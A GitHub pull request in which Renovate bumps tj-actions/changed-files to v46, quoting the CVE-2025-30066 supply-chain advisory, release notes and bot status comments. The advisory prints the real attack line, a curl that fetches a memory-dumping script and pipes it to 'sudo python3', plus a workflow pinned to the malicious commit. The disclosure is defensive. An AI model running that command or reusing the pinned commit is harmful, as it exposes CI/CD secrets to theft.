Skip to content

Update tj-actions/changed-files action to v46 [SECURITY]#199

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/github-tags-tj-actions-changed-files-vulnerability
Open

Update tj-actions/changed-files action to v46 [SECURITY]#199
renovate[bot] wants to merge 1 commit intomainfrom
renovate/github-tags-tj-actions-changed-files-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Feb 27, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Type Update Change
tj-actions/changed-files action major v41v46

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2025-30066

Summary

A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in v46.0.1.

Details

The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

Key Indicators of Compromise (IoC):

  • Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • Retroactively updated tags pointing to the malicious commit:
    • v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
    • v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
    • v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67

Malicious Code Execution:

The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:

B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`

This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.

Proof of Concept (PoC)

Steps to Reproduce:

  1. Create a GitHub Actions workflow using the tj-actions/changed-files action:
name: "tj-action changed-files incident"
on:
  pull_request:
    branches:
      - main
jobs:
  changed_files:
    runs-on: ubuntu-latest
    steps:
      - name: Get changed files
        id: changed-files
        uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67
  1. Run the workflow and inspect the logs in the Actions tab.
  2. Vulnerable workflows may display secrets in the logs.

Detection:

Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:

  • gist.githubusercontent.com

Live reproduction logs:
🔗 Harden-Runner Insights

This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.

Duration of Vulnerability

The vulnerability was active between March 14 and March 15, 2025.

Action Required

  1. Review your workflows executed between March 14 and March 15:

    • Check the changed-files section for unexpected output.
    • Decode suspicious output using the following command: 
      echo 'xxx' | base64 -d | base64 -d
    • If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.

  2. Update workflows referencing the compromised commit:

    • If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.

  3. Tagged versions:

    • If you are using tagged versions (e.g., v35, v44.5.1), no action is required as these tags have been updated and are now safe to use.

  4. Rotate potentially exposed secrets:

    • As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.

Impact

  • Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage
  • Who is impacted:
    • Over 23,000 repositories using tj-actions/changed-files.
    • Organizations with public repositories are at the highest risk, as their logs may already be compromised.
  • Potential consequences:
    • Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
    • Unauthorized access to source code, infrastructure, and production environments.
    • Credential leaks in public repositories, enabling further supply chain attacks.

Release Notes

tj-actions/changed-files (tj-actions/changed-files)

v46

Compare Source

🚀 Features

➖ Remove

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (3dbc1e1) - (github-actions[bot])

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (b1ccff8) - (github-actions[bot])

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (050a3d3) - (github-actions[bot])

📚 Documentation

  • Update link to glob patterns (#​2590) (a892f50) - (Tonye Jack)
  • Add Jellyfrog as a contributor for code, and doc (#​2573) (f000a9b) - (allcontributors[bot])

🧪 Testing

⚙️ Miscellaneous Tasks

⬆️ Upgrades

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (db731a1) - (github-actions[bot])

v45

Compare Source

🐛 Bug Fixes

⚙️ Miscellaneous Tasks

⬆️ Upgrades

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (a284dc1) - (tj-actions[bot])

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (b1ba699) - (tj-actions[bot])

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (ed8e9f6) - (tj-actions[bot])

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (8082fbc) - (tj-actions[bot])

Co-authored-by: jackton1 <17484350+jackton1@​users.noreply.github.com> (6809677) - (tj-actions[bot])

v44

Compare Source

🐛 Bug Fixes

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@aviator-app
Copy link

aviator-app bot commented Feb 27, 2026

Current Aviator status

Aviator will automatically update this comment as the status of the PR changes.
Comment /aviator refresh to force Aviator to re-examine your PR (or learn about other /aviator commands).

This pull request is currently open (not queued).

How to merge

To merge this PR, comment /aviator merge or add the mergequeue label.

See the real-time status of this PR on the Aviator webapp.
Use the Aviator Chrome Extension to see the status of your PR within GitHub.

@performance-testing-bot
Copy link

performance-testing-bot bot commented Feb 27, 2026

Unable to locate .performanceTestingBot config file

@secure-code-warrior-for-github
Copy link

secure-code-warrior-for-github bot commented Feb 27, 2026

Micro-Learning Topic: Information disclosure (Detected by phrase)

Matched on "Information leakage"

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. Source: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Try a challenge in Secure Code Warrior

@difflens
Copy link

difflens bot commented Feb 27, 2026

View changes in DiffLens

@lang-ci
Copy link

lang-ci bot commented Feb 27, 2026
edited
Loading

I'll summarise github action errors for you when they occur.

ℹ️ Help (You can turn this bot off by adding a comment /ai off, or force a refresh of this report with /ai ...)

For more support, join our Discord channel

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

EDIT: Creating a new report...

@AdamOswald
Copy link
Owner

AdamOswald commented Feb 27, 2026

Snyk checks have passed. No issues have been found so far.

Status Scanner Critical High Medium Low Total (0)
Open Source Security 0 0 0 0 0 issues

💻 Catch issues earlier using the plugins for VS Code, JetBrains IDEs, Visual Studio, and Eclipse.

@socket-security
Copy link

socket-security bot commented Feb 27, 2026

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff Package Supply Chain
Security		 Vulnerability Quality Maintenance License
Addedpypi/​numpy@​2.4.27510010010070
Addedpypi/​django@​6.0.276100100100100
Addedpypi/​gunicorn@​25.1.096100100100100
Addedpypi/​certifi@​2026.2.2510010010010070
Addedpypi/​liqpay-sdk-python3@​1.0.610010099100100
Addedpypi/​apscheduler@​3.11.2100100100100100
Addedpypi/​asgiref@​3.11.1100100100100100
Addedpypi/​django-money@​3.6.0100100100100100
Addedpypi/​dj-database-url@​3.1.2100100100100100

View full report

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

size/XS

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@AdamOswald